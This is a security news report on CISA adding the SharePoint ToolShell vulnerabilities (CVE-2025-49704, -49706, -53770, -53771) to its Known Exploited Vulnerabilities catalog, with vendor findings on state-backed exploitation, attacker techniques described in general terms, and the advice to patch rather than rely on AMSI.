The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two critical Microsoft SharePoint vulnerabilities—CVE-2025-49704 and CVE-2025-49706—to its Known Exploited Vulnerabilities (KEV) catalog as of July 22, 2025, following confirmed evidence of active exploitation. In response, Federal Civilian Executive Branch (FCEB) agencies have been directed to address the vulnerabilities by July 23, 2025.
“CISA is aware of active exploitation of a spoofing and RCE vulnerability chain involving CVE-2025-49706 and CVE-2025-49704, enabling unauthorized access to on-premise SharePoint servers,” the agency said in a public advisory.
These flaws, part of a broader exploit chain referred to as ToolShell, are now linked to Chinese state-backed groups, including Linen Typhoon and Violet Typhoon, who have been exploiting the vulnerabilities since early July 2025, according to Microsoft. The two bugs include a remote code execution (RCE) issue and a post-authentication spoofing flaw, both of which can allow attackers to gain elevated access to SharePoint environments.
Microsoft has officially acknowledged CVE-2025-53770 as actively exploited in the wild and provided further descriptions of four related flaws:
CVE-2025-49704 – SharePoint Remote Code Execution
CVE-2025-49706 – SharePoint Post-auth Remote Code Execution
CVE-2025-53770 – ToolShell Authentication Bypass & RCE
CVE-2025-53771 – ToolShell Path Traversal
According to Akamai researchers, “The root cause [of CVE-2025-53770] is a combination of two bugs: An authentication bypass (CVE-2025-49706) and an insecure deserialization vulnerability (CVE-2025-49704).”
Threat actors have been seen deploying web shells, extracting MachineKey data, and executing encoded PowerShell commands to download malicious files such as “client.exe,” disguised as benign files like “debug.js.” Symantec reported that the binary is used to launch scripts that gather system and cryptographic information.
Security firm watchTowr revealed it can exploit CVE-2025-53770 to bypass Microsoft’s Antimalware Scan Interface (AMSI) mitigation. “AMSI was never a silver bullet… But we’re concerned to hear that some organizations are choosing to ‘enable AMSI’ instead of patching. This is a very bad idea,” warned CEO Benjamin Harris.
CISA’s Chris Butera confirmed the agency is collaborating with Microsoft and other partners. “CISA continues to work in lockstep with Microsoft, as well as federal and other partners, to address and mitigate the active exploitation of multiple vulnerabilities impacting Microsoft on-site SharePoint servers.”
Current estimates suggest around 400 organizations, including federal agencies and SLTT partners, have been compromised in this wave of exploitation.